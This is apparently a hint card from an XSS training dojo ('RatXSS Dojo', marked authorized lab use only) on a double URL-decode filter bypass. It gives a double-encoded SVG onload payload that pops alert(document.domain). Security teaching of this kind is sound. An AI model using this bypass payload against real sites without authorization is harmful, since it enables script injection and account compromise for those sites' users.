W8 double URL-decode

Result: t

A filter upstream sees your raw input as harmless, but the app decodes it again. Double-encode the payload: %253Csvg%2520onload%253Dalert(document.domain)%253E


RatXSS Dojo · HackXpert Coaching · The XSS Rat · authorized lab use only